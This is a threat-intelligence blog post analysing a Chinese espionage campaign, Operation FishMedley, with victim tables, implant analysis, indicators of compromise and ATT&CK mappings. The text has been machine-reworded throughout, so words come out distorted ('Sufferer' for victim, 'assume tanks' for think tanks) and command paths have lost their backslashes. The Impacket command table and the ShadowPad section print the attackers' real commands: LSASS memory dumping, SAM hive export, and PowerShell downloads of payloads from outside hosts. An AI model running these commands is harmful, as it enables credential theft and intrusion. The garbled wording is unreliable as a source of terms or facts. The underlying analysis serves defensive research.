On March 5^{th<\/sup>, 2025, the US DOJ unsealed an indictment in opposition to staff of the Chinese language contractor I\u2011SOON for his or her involvement in a number of world espionage operations. These embrace assaults that we beforehand documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 together with the compromise of seven organizations that we recognized as being focused in a 2022 marketing campaign that we named Operation FishMedley.<\/p>\n}

\n
Key factors of this blogpost:<\/strong><\/p>\n
\n
Verticals focused throughout Operation FishMedley embrace governments, NGOs, and assume tanks, throughout Asia, Europe, and america.<\/li>\n
Operators used implants \u2013 resembling ShadowPad, SodaMaster, and Spyder \u2013 which can be frequent or unique to China-aligned menace actors.<\/li>\n
We assess with excessive confidence that Operation FishMedley was carried out by the FishMonger APT group.<\/li>\n
Impartial of the DOJ indictment, we decided that FishMonger is operated by I\u2011SOON.<\/li>\n<\/ul>\n<\/blockquote>\n
FishMonger profile<\/h2>\n
FishMonger \u2013 a bunch believed to be operated by the Chinese language contractor I\u2011SOON (see our This fall\u00a02023-Q1\u00a02024 APT Exercise Report<\/a>) \u2013 falls underneath the Winnti Group umbrella and is more than likely working out of China, from town of Chengdu the place I\u2011SOON\u2019s workplace was positioned<\/a>. FishMonger is also called Earth Lusca, TAG\u201122, Aquatic Panda, or Pink Dev 10. We revealed<\/a> an evaluation of this group in early 2020 when it closely focused universities in Hong Kong through the civic protests that began in June 2019. We initially attributed the incident to Winnti Group however have since revised our attribution to FishMonger.<\/p>\n
The group is understood to function watering-hole assaults, as reported by Development Micro<\/a>. FishMonger\u2019s toolset consists of ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.<\/p>\n
Overview<\/h2>\n
On March 5^{th<\/sup>, 2025, the US Division of Justice revealed a}press launch<\/a> and unsealed an indictment<\/a> in opposition to I\u2011SOON staff and officers of China\u2019s Ministry of Public Safety concerned in a number of espionage campaigns from 2016 to 2023. The FBI additionally added these named within the indictment to its \u201cmost wished\u201d checklist<\/a> and revealed a poster, as seen in Determine 1.<\/p>\n
$\"Figure$
Determine 1. Names of FishMonger \/ I\u2011SOON members (supply: FBI)<\/em><\/figcaption><\/figure>\nThe indictment describes a number of assaults which can be strongly associated to what we revealed in a personal APT intelligence report<\/a> in early 2023. On this blogpost, we share our technical data about this world marketing campaign that focused governments, NGOs, and assume tanks throughout Asia, Europe, and america. We imagine that this data enhances the lately revealed indictment.<\/p>\n
Throughout 2022, we investigated a number of compromises the place implants resembling ShadowPad and SodaMaster, that are generally employed by China-aligned menace actors, had been used. We had been capable of cluster seven unbiased incidents for this blogpost and have named that marketing campaign Operation FishMedley.<\/p>\n
FishMonger and I-SOON<\/h3>\n
Throughout our analysis, we had been capable of independently decide that FishMonger is an espionage staff operated by I\u2011SOON, a Chinese language contractor based mostly in Chengdu that suffered an notorious doc leak in 2024 \u2013 see this complete evaluation from Harfang Labs<\/a>.<\/p>\n
Victimology<\/h3>\n
Desk 1 reveals particulars in regards to the seven victims we recognized. The verticals and international locations are numerous, however most are of apparent curiosity to the Chinese language authorities.<\/p>\n
Desk 1. Victimology particulars<\/em><\/p>\n\n\n\n\n\n\n\n\n\n\n\n
Sufferer<\/strong> <\/td>\n Date of compromise<\/strong> <\/td>\n Nation<\/strong> <\/td>\n Vertical<\/strong> <\/td>\n<\/tr>\n<\/thead>\n
A<\/strong> <\/td>\n January 2022 <\/td>\n Taiwan <\/td>\n Governmental group. <\/td>\n<\/tr>\n
B<\/strong> <\/td>\n January 2022 <\/td>\n Hungary <\/td>\n Catholic group. <\/td>\n<\/tr>\n
C<\/strong> <\/td>\n February 2022 <\/td>\n Turkey <\/td>\n Unknown. <\/td>\n<\/tr>\n
D<\/strong> <\/td>\n March 2022 <\/td>\n Thailand <\/td>\n Governmental group. <\/td>\n<\/tr>\n
E<\/strong> <\/td>\n April 2022 <\/td>\n United States <\/td>\n Catholic charity working worldwide. <\/td>\n<\/tr>\n
F<\/strong> <\/td>\n June 2022 <\/td>\n United States <\/td>\n NGO \u2013 primarily lively in Asia. <\/td>\n<\/tr>\n
G<\/strong> <\/td>\n October 2022 <\/td>\n France <\/td>\n Geopolitical assume tank. <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Desk 2 summarizes the implants used throughout every intrusion of Operation FishMedley.<\/p>\n
Desk 2. Particulars of the implants used in opposition to every sufferer<\/em><\/p>\n
\n\n\n\n\n\n\n\n\n\n\n\n
Sufferer | Instrument<\/td>\n ScatterBee-packed ShadowPad<\/td>\n Spyder<\/td>\n SodaMaster<\/td>\n RPipeCommander<\/td>\n<\/tr>\n<\/thead>\n
A<\/strong><\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n<\/tr>\n
B<\/strong><\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n<\/tr>\n
C<\/strong><\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n<\/tr>\n
D<\/strong><\/td>\n \u25cf<\/strong><\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n<\/tr>\n
E<\/strong><\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n<\/tr>\n
F<\/strong><\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n<\/tr>\n
G<\/strong><\/td>\n \u00a0<\/td>\n \u00a0<\/td>\n \u25cf<\/strong><\/td>\n \u00a0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Technical evaluation<\/h2>\n
Preliminary entry<\/h3>\n
We had been unable to determine the preliminary compromise vectors. For many instances, the attackers appeared to have had privileged entry contained in the native community, resembling area administrator credentials.<\/p>\n
At Sufferer D, the attackers gained entry to an admin console and used it to deploy implants on different machines within the native community. It’s possible that they first compromised the machine of a sysadmin or safety analyst after which stole credentials that allowed them to connect with the console.<\/p>\n
At Sufferer F, the implants had been delivered utilizing Impacket<\/a>, which signifies that the attackers by some means beforehand compromised a high-privilege area account.<\/p>\n
Lateral motion<\/h3>\n
At Sufferer F, the operators additionally used Impacket to maneuver laterally. They gathered data on different native machines and put in implants.<\/p>\n
Desk 3 reveals that the operators first did some handbook reconnaissance utilizing quser.exe<\/span>, wmic.exe<\/span>, and ipconfig.exe<\/span>. Then they tried to get credentials and different secrets and techniques by dumping<\/a> the native safety authority subsystem service (LSASS) course of (PID 944). The PID of the method was obtained by way of tasklist \/svc<\/span> and the dump was carried out utilizing comsvcs.dll<\/span>, which is a recognized living-off-the-land binary (LOLBIN<\/a>). Word that it’s probably that the attackers executed quser.exe<\/span> to see whether or not different customers or admins had been additionally logged in, that means privileged accesses had been current in LSASS. Based on Microsoft documentation<\/a>, to make use of this command the attacker will need to have Full Management permission or particular entry permission.<\/p>\n
In addition they saved the registry hives sam.hive<\/span> and system.hive<\/span>, which may each include secrets and techniques or credentials.<\/p>\n
Lastly, they tried to dump the LSASS course of once more, utilizing a for<\/span> loop iterating over the output from tasklist.exe<\/span>. We’ve seen this identical code used on different machines, so it’s a good suggestion to dam or at the least alert on it.<\/p>\n
Desk 3. Instructions executed by way of Impacket on a machine at Sufferer F<\/em><\/p>\n
<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Timestamp (UTC)<\/strong><\/td>\n Command<\/strong><\/td>\n<\/tr>\n<\/thead>\n
2022-06-21 07:34:07<\/td>\n quser<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n wmic os get lastbootuptime<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n ipconfig \/all<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n tasklist \/svc<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c “C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full”<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n reg save hklmsam C:userspublicmusicsam.hive<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n reg save hklmsystem C:userspublicmusicsystem.hive<\/span><\/td>\n<\/tr>\n
2022-06-21 14:41:23<\/td>\n internet person<\/span><\/td>\n<\/tr>\n
2022-06-22 07:05:37<\/td>\n tasklist \/v<\/span><\/td>\n<\/tr>\n
2022-06-22 07:07:33<\/td>\n dir c:customers<\/span><\/td>\n<\/tr>\n
2022-06-22 09:47:52<\/td>\n for \/f “tokens=1,2 delims= ” ^%A in (‘”tasklist \/fi “Imagename eq lsass.exe” | discover “lsass””‘) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
<\/span><\/h3>\n
Toolset<\/h3>\n
ShadowPad<\/h4>\n
ShadowPad is a well known and privately offered modular backdoor, recognized to solely be equipped to China-aligned APT teams, together with FishMonger<\/a> and SparklingGoblin<\/a>, as documented by SentinelOne<\/a>. In Operation FishMedley, the attackers used a ShadowPad model full of ScatterBee<\/a>.<\/p>\n
At Sufferer D, the loader was downloaded utilizing the next PowerShell command:<\/p>\n
powershell (new-object System.Web.WebClient).DownloadFile(“http:\/\/\/Pictures\/menu\/log.dll”;”c:userspubliclog.dll”)<\/victim><\/span><\/p>\n
This reveals that the attackers compromised an internet server on the sufferer\u2019s group to make use of it as a staging server for his or her malware.<\/p>\n
At Sufferer F, Firefox was used to obtain the loader, from http:\/\/5.188.230[.]47\/log.dll<\/span>. We don\u2019t know whether or not attackers had interactive entry to the machine, whether or not one other piece of malware was working within the Firefox course of, or whether or not the sufferer was redirected to the obtain web page, say by way of a watering-hole assault.<\/p>\n
log.dll<\/span> is side-loaded by an previous Bitdefender executable (authentic title: BDReinit.exe<\/span>) and masses ShadowPad from a file named log.dll.dat<\/span>, which might be decrypted utilizing the scripts offered in PwC\u2019s GitHub<\/a> repository.<\/p>\n
We didn’t get better the log.dll.dat<\/span> from the sufferer\u2019s machine, however we discovered a faux Adobe Flash installer on VirusTotal<\/a> with the equivalent log.dll<\/span> file. The configuration of the ShadowPad payload is offered in Desk 4.<\/p>\n
Desk 4. ShadowPad configuration<\/em><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Discipline<\/strong><\/td>\n Decrypted worth<\/strong><\/td>\n<\/tr>\n<\/thead>\n
Timestamp<\/strong><\/td>\n 3\/14\/2022 10:52:16 PM<\/span><\/td>\n<\/tr>\n
Marketing campaign code<\/strong><\/td>\n 2203<\/span><\/td>\n<\/tr>\n
File path<\/strong><\/td>\n %ALLUSERSPROFILEpercentDRMTest<\/span><\/td>\n<\/tr>\n
Spoofed title<\/strong><\/td>\n Check.exe<\/span><\/td>\n<\/tr>\n
Loader filename<\/strong><\/td>\n log.dll<\/span><\/td>\n<\/tr>\n
Payload filename<\/strong><\/td>\n log.dll.dat<\/span><\/td>\n<\/tr>\n
Service title<\/strong><\/td>\n MyTest2<\/span><\/td>\n<\/tr>\n
Different service title<\/strong><\/td>\n MyTest2<\/span><\/td>\n<\/tr>\n
Different service title<\/strong><\/td>\n MyTest2<\/span><\/td>\n<\/tr>\n
Registry key path<\/strong><\/td>\n SOFTWAREMicrosoftWindowsCurrentVersionRun<\/span><\/td>\n<\/tr>\n
Service description<\/strong><\/td>\n MyTest2<\/span><\/td>\n<\/tr>\n
Program to inject into<\/strong><\/td>\n %ProgramFilespercentWindows Media Playerwmplayer.exe<\/span><\/td>\n<\/tr>\n
Different injection goal<\/strong><\/td>\n N\/A<\/span><\/td>\n<\/tr>\n
Different injection goal<\/strong><\/td>\n N\/A<\/span><\/td>\n<\/tr>\n
Different injection goal<\/strong><\/td>\n %windirpercentsystem32svchost.exe<\/span><\/td>\n<\/tr>\n
C&C URL<\/strong><\/td>\n TCP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n
Different C&C URL<\/strong><\/td>\n UDP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n
Different C&C URL<\/strong><\/td>\n N\/A<\/span><\/td>\n<\/tr>\n
Different C&C URL<\/strong><\/td>\n N\/A<\/span><\/td>\n<\/tr>\n
Proxy data string<\/strong><\/td>\n SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n
Proxy data string<\/strong><\/td>\n SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n
Proxy data string<\/strong><\/td>\n SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n
Proxy data string<\/strong><\/td>\n SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Word that from March 20^{th<\/sup>, 2022 to November 2^{nd<\/sup>, 2022, the C&C area resolved to 213.59.118[.]124<\/span>, which is talked about in a VMware blogpost<\/a> about ShadowPad.<\/p>\n}}
Spyder<\/h4>\n
At Sufferer D, we detected one other backdoor usually utilized by FishMonger: Spyder, a modular implant that was analyzed in nice element by Dr.Net<\/a>.<\/p>\n
A Spyder loader was downloaded from http:\/\/\/Pictures\/menu\/aa.doc<\/a_victim><\/span> and dropped to C:UsersPublictask.exe<\/span> round 18 hours after ShadowPad was put in.<\/p>\n
The loader \u2013 see Determine 2; reads the file c:windowstempguid.dat<\/span> and decrypts its contents utilizing AES-CBC. The encryption secret is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00<\/span>. The initialization vector (IV) is the primary eight bytes of the important thing. Sadly, we had been unable to get better the guid.dat<\/span> file.<\/p>\n
$\"Figure$
Determine 2. Spyder loader<\/em><\/figcaption><\/figure>\n
Then, the loader injects the decoded content material \u2013 probably shellcode \u2013 into itself (process.exe<\/span> course of) as seen in Determine 3.<\/p>\n
$\"Figure$
Determine 3. Spyder loader \u2013 injection half<\/em><\/figcaption><\/figure>\n
Regardless of not acquiring the encrypted closing payload, our product did detect a Spyder payload in reminiscence and it was virtually equivalent to the Spyder variant documented by Dr.Net. The C&C server was hardcoded to 61.238.103[.]165<\/span>.<\/p>\n
Curiously, a number of subdomains of junlper[.]com<\/span>, a recognized Spyder C&C area and a weak homoglyph area to juniper.internet<\/span>, resolved to 61.238.103[.]165<\/span> in 2022.<\/p>\n
A self-signed TLS certificates was current on port 443 of the server from Could to December 2022, with the thumbprint 89EDCFFC66EDA3AEB75E140816702F9AC73A75F0<\/span>. Based on SentinelOne<\/a>, it’s a certificates utilized by FishMonger for its C&C servers.<\/p>\n
SodaMaster<\/h4>\n
SodaMaster is a backdoor that was documented by Kaspersky<\/a> in 2021. APT10 was the primary group recognized to have entry to this backdoor however Operation FishMedley signifies that it could now be shared amongst a number of China-aligned APT teams.<\/p>\n
SodaMaster can solely be discovered decrypted in reminiscence and that\u2019s the place we detected it. Though we didn’t get better the complete loading chain, we now have recognized just a few samples which can be step one of the chain.<\/p>\n
SodaMaster loaders<\/h5>\n
We discovered six completely different malicious DLLs which can be abusing reputable executables by way of DLL side-loading<\/a>. All of them implement the identical decryption and injection routine.<\/p>\n
First, the loader reads a hardcoded file, for instance debug.png<\/span>, and XOR decrypts it utilizing a hardcoded 239-byte key. Desk 5 summarizes the completely different loaders. Word that the XOR key can also be completely different in every pattern, however too lengthy to be included within the desk. Additionally be aware that we didn’t get better any of those encrypted payloads.<\/p>\n
Desk 5. SodaMaster loaders<\/em><\/p>\n\n\n\n\n\n\n\n\n\n\n
SHA-1<\/strong><\/td>\n DLL title<\/strong><\/td>\n Payload filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n
3C08C694C222E7346BD8633461C5D19EAE18B661<\/span><\/td>\n DrsSDK.dll<\/span><\/td>\n debug.png<\/current_directory><\/span><\/td>\n<\/tr>\n
D8B631C551845F892EBB5E7D09991F6C9D4FACAD<\/span><\/td>\n libvlc.dll<\/span><\/td>\n vlc.cnf<\/current_directory><\/span><\/td>\n<\/tr>\n
3A702704653EC847CF9121E3F454F3DBE1F90AFD<\/span><\/td>\n safestore64.dll<\/span><\/td>\n Location<\/current_directory><\/span><\/td>\n<\/tr>\n
3630F62771360540B66701ABC8F6C868087A6918<\/span><\/td>\n DeElevator64.dll<\/span><\/td>\n Location<\/current_directory><\/span><\/td>\n<\/tr>\n
A4F68D0F1C72C3AC9D70919C17DC52692C43599E<\/span><\/td>\n libmaxminddb-0.dll<\/span><\/td>\n C:windowssystem32MsKeyboardFilterapi.dll<\/span><\/td>\n<\/tr>\n
5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF<\/span><\/td>\n safestore641.dll<\/span><\/td>\n Location<\/current_directory><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Then, the decrypted buffer is injected right into a newly created, suspended svchost.exe<\/span> course of \u2013 see Determine 4.<\/p>\n
$\"Figure$
Determine 4. SodaMaster injection<\/em><\/figcaption><\/figure>\n
Lastly, the shellcode is executed utilizing both CreateRemoteThread<\/span> (on Home windows XP or older variations) or, on newer Home windows variations, by way of NtCreateThreadEx<\/span> as proven in Determine 5.<\/p>\n
$\"Figure$
Determine 5. Execution of the injected payload<\/em><\/figcaption><\/figure>\n
The final 4 loaders in Desk 5 have extra options:<\/p>\n
\n
They’ve an export named getAllAuthData<\/span> that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the question SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins<\/span>.<\/li>\n
The final three loaders persist as a service named Netlock<\/span>, MsKeyboardFiltersrv<\/span>, and downmap<\/span>, respectively.<\/li>\n<\/ul>\n
SodaMaster payload<\/h5>\n
As talked about above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we\u2019ve discovered don\u2019t appear to have developed a lot. They nonetheless implement the identical 4 backdoor instructions (d<\/span>, f<\/span>, l<\/span>, and s<\/span>) that had been current in 2021.<\/p>\n
Desk 6 reveals the configurations from the 4 completely different SodaMaster payloads that we recognized. Operators used a special C&C server per sufferer, however we will see that Victims B and C share the identical hardcoded RSA key.<\/p>\n
Desk 6. SodaMaster configuration<\/em><\/p>\n
<\/p>\n\n\n\n\n\n\n\n\n
Sufferer<\/strong><\/td>\n C&C server<\/strong><\/td>\n RSA key<\/strong><\/td>\n<\/tr>\n<\/thead>\n
B<\/strong><\/td>\n 162.33.178[.]23<\/span><\/td>\n MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n
C<\/strong><\/td>\n 78.141.202[.]70<\/span><\/td>\n MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n
F<\/strong><\/td>\n 192.46.223[.]211<\/span><\/td>\n MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+\/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm\/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE=<\/span><\/td>\n<\/tr>\n
G<\/strong><\/td>\n 168.100.10[.]136<\/span><\/td>\n MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE=<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
<\/span><\/h4>\n
RPipeCommander<\/h4>\n
At Sufferer D, we captured a beforehand unknown implant in the identical course of the place Spyder was working. It was most likely loaded from disk or downloaded by Spyder. As a result of its DLL export title was rcmd64.dll<\/span>, we named this implant RPipeCommander.<\/p>\n
RPipeCommander is multithreaded and makes use of IoCompletionPort<\/span> to handle the I\/O requests of the a number of threads. It creates the named pipe .PipeCmdPipe<\/span>, the place <\/span> is the present course of ID, and reads from and writes into this pipe.<\/p>\n
RPipeCommander is a reverse shell that accepts three instructions by way of the named pipe:<\/p>\n
\n
h<\/span> (0x68<\/span>): create a cmd.exe<\/span> course of and bind pipes to the method to ship instructions and browse the output.<\/li>\n
i<\/span> (0x69<\/span>): Write a command within the current cmd.exe<\/span> course of or learn the output of the earlier command.<\/li>\n
j<\/span> (0x6A<\/span>): exit the cmd.exe<\/span> course of by writing exitrn<\/span> within the command shell.<\/li>\n<\/ul>\n
Word that it appears we solely have the server facet of RPipeCommander. It’s probably {that a} second part, a shopper, is used to ship instructions to the server from one other machine on the native community.<\/p>\n
Lastly, RPipeCommander is written in C++ and RTTI data was included within the captured samples, permitting us to acquire a number of the class names:<\/p>\n
\n
CPipeServer<\/span><\/li>\n
CPipeBuffer<\/span><\/li>\n
CPipeSrvEvent<\/span><\/li>\n
CPipeServerEventHandler<\/span><\/li>\n<\/ul>\n
Different instruments<\/h4>\n
Along with the principle implants described above, the attackers used just a few extra instruments to gather or exfiltrate information, which we describe in Desk 7.<\/p>\n
Desk 7. Different instruments used throughout Operation FishMedley<\/em><\/p>\n\n\n\n\n\n\n\n\n
Filename<\/strong><\/td>\n Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n
C:Windowssystem32sasetup.dll<\/span><\/td>\n Customized password filter<\/a>. The export PasswordChangeNotify<\/span> is known as when the person adjustments their password, and it writes the brand new password on disk within the present working listing in a log file named etuper.log<\/span>. Word that it will probably additionally exfiltrate the password by sending a POST request to a hardcoded C&C server, with flag=<\/span> within the POST information. Nonetheless, this performance will not be enabled on this particular pattern and there’s no C&C server within the configuration.<\/td>\n<\/tr>\n
C:Windowsdebugsvhost.tmp<\/span><\/td>\n The fscan community scanner, obtainable on GitHub<\/a>.<\/td>\n<\/tr>\n
C:nb.exe<\/span><\/td>\n nbtscan<\/a> \u2013 a NetBIOS scanner.<\/td>\n<\/tr>\n
C:Userspublicdrop.zip<\/span><\/td>\n It accommodates solely dbxcli<\/a> \u2013 a device written in Go to work together with Dropbox. It was probably used to exfiltrate information from the sufferer\u2019s community, however we haven\u2019t retrieved any details about the attackers\u2019 account.
Word that, regardless of the.zip<\/span> extension, it is a CAB file. It was downloaded from http:\/\/45.76.165[.]227\/wECqKe529r.png<\/span>.
Additionally be aware that dbxcli appears to have been compiled by the attackers, for the reason that hash (SHA-1: 2AD82FFA393937A2353096FE2A2209E0EBC1C9D7<\/span>) has a really low prevalence within the wild.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Conclusion<\/h2>\n
On this blogpost, we now have proven how FishMonger carried out a marketing campaign in opposition to high-profile entities all world wide and was the topic of a US DOJ indictment in March 2025. We additionally confirmed that the group will not be shy about reusing well-known implants, resembling ShadowPad or SodaMaster, even lengthy after they’ve been publicly described. Lastly, we now have independently confirmed that FishMonger is a staff that’s a part of the Chinese language firm I\u2011SOON.<\/p>\n
\n
For any inquiries about our analysis revealed on WeLiveSecurity, please contact us at threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n
ESET Analysis affords personal APT intelligence reviews and information feeds. For any inquiries about this service, go to the ESET Menace Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n
IoCs<\/h2>\n
A complete checklist of indicators of compromise (IoCs) and samples might be present in our GitHub repository<\/a>.<\/em><\/p>\n
Recordsdata<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SHA-1<\/strong><\/td>\n Filename<\/strong><\/td>\n Detection<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
D61A4387466A0C999981086C2C994F2A80193CE3<\/span><\/td>\n N\/A<\/td>\n Win32\/Agent.ADVC<\/td>\n ShadowPad dropper.<\/td>\n<\/tr>\n
918DDD842787D64B244D353BFC0E14CC037D2D97<\/span><\/td>\n log.dll<\/span><\/td>\n Win32\/Agent.ADVC<\/td>\n ScatterBee-packed ShadowPad loader.<\/td>\n<\/tr>\n
F12C8CEC813257890F4856353ABD9F739DEED890<\/span><\/td>\n process.exe<\/span><\/td>\n Win64\/Agent.BEJ<\/td>\n Spyder loader.<\/td>\n<\/tr>\n
3630F62771360540B66701ABC8F6C868087A6918<\/span><\/td>\n DeElevator64.dll<\/span><\/td>\n Win64\/PSW.Agent.CU<\/td>\n SodaMaster loader.<\/td>\n<\/tr>\n
3C08C694C222E7346BD8633461C5D19EAE18B661<\/span><\/td>\n DrsSDK.dll<\/span><\/td>\n Win64\/Agent.CAC<\/td>\n SodaMaster loader.<\/td>\n<\/tr>\n
5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF<\/span><\/td>\n safestore64.dll<\/span><\/td>\n Win64\/PSW.Agent.CU<\/td>\n SodaMaster loader.<\/td>\n<\/tr>\n
A4F68D0F1C72C3AC9D70919C17DC52692C43599E<\/span><\/td>\n libmaxminddb-0.dll<\/span><\/td>\n Win64\/PSW.Agent.CU<\/td>\n SodaMaster loader.<\/td>\n<\/tr>\n
D8B631C551845F892EBB5E7D09991F6C9D4FACAD<\/span><\/td>\n libvlc.dll<\/span><\/td>\n Win64\/Agent.BFZ<\/td>\n SodaMaster loader.<\/td>\n<\/tr>\n
3F5F6839C7DCB1D164E4813AF2E30E9461AB35C1<\/span><\/td>\n sasetup.dll<\/span><\/td>\n Win64\/PSW.Agent.CB<\/td>\n Malicious password filter.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Community<\/h3>\n\n\n\n\n\n\n\n\n\n\n
IP<\/strong><\/td>\n Area<\/strong><\/td>\n Internet hosting supplier<\/strong><\/td>\n First seen<\/strong><\/td>\n Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n
213.59.118[.]124<\/span><\/td>\n api.googleauthenticatoronline[.]com<\/span><\/td>\n STARK INDUSTRIES<\/td>\n 2022\u201103\u201120<\/td>\n ShadowPad C&C server.<\/td>\n<\/tr>\n
61.238.103[.]165<\/span><\/td>\n N\/A<\/td>\n IRT-HKBN-HK<\/td>\n 2022\u201103\u201110<\/td>\n Spyder C&C server.<\/td>\n<\/tr>\n
162.33.178[.]23<\/span><\/td>\n N\/A<\/td>\n BL Networks<\/td>\n 2022\u201103\u201128<\/td>\n SodaMaster C&C server.<\/td>\n<\/tr>\n
78.141.202[.]70<\/span><\/td>\n N\/A<\/td>\n The Fixed Firm<\/td>\n 2022\u201105\u201118<\/td>\n SodaMaster C&C server.<\/td>\n<\/tr>\n
192.46.223[.]211<\/span><\/td>\n N\/A<\/td>\n Akamai Related Cloud<\/td>\n 2022\u201106\u201122<\/td>\n SodaMaster C&C server.<\/td>\n<\/tr>\n
168.100.10[.]136<\/span><\/td>\n N\/A<\/td>\n BL Networks<\/td>\n 2022\u201105\u201112<\/td>\n SodaMaster C&C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
MITRE ATT&CK strategies<\/h2>\n
This desk was constructed utilizing model 16<\/a> of the MITRE ATT&CK framework.<\/strong><\/em><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Tactic<\/strong><\/td>\n ID<\/strong><\/td>\n Identify<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
Useful resource Growth<\/strong><\/td>\n T1583.004<\/a><\/td>\n Purchase Infrastructure: Server<\/td>\n FishMonger rented servers at a number of internet hosting suppliers.<\/td>\n<\/tr>\n
T1583.001<\/a><\/td>\n Purchase Infrastructure: Domains<\/td>\n FishMonger purchased domains and used them for C&C site visitors.<\/td>\n<\/tr>\n
Execution<\/strong><\/td>\n T1059.001<\/a><\/td>\n Command-Line Interface: PowerShell<\/td>\n FishMonger downloaded ShadowPad utilizing PowerShell.<\/td>\n<\/tr>\n
T1059.003<\/a><\/td>\n Command-Line Interface: Home windows Command Shell<\/td>\n FishMonger deployed Spyder utilizing a BAT script.<\/td>\n<\/tr>\n
T1072<\/a><\/td>\n Software program Deployment Instruments<\/td>\n FishMonger gained entry to an area admin console, abusing it to run instructions on different machines within the sufferer\u2019s community.<\/td>\n<\/tr>\n
Persistence<\/strong><\/td>\n T1543.003<\/a><\/td>\n Create or Modify System Course of: Home windows Service<\/td>\n Some SodaMaster loaders persist by way of a Home windows service.<\/td>\n<\/tr>\n
Protection Evasion<\/strong><\/td>\n T1574.002<\/a><\/td>\n Hijack Execution Circulation: DLL Aspect-Loading<\/td>\n ShadowPad is loaded by a DLL named log.dll<\/span> that’s side-loaded by a reputable Bitdefender executable.<\/td>\n<\/tr>\n
T1140<\/a><\/td>\n Deobfuscate\/Decode Recordsdata or Info<\/td>\n ShadowPad, Spyder, and SodaMaster are decrypted and loaded into reminiscence.<\/td>\n<\/tr>\n
Credential Entry<\/strong><\/td>\n T1555.003<\/a><\/td>\n Credentials from Password Shops: Credentials from Net Browsers<\/td>\n Some SodaMaster loaders can extract passwords from the native Firefox database.<\/td>\n<\/tr>\n
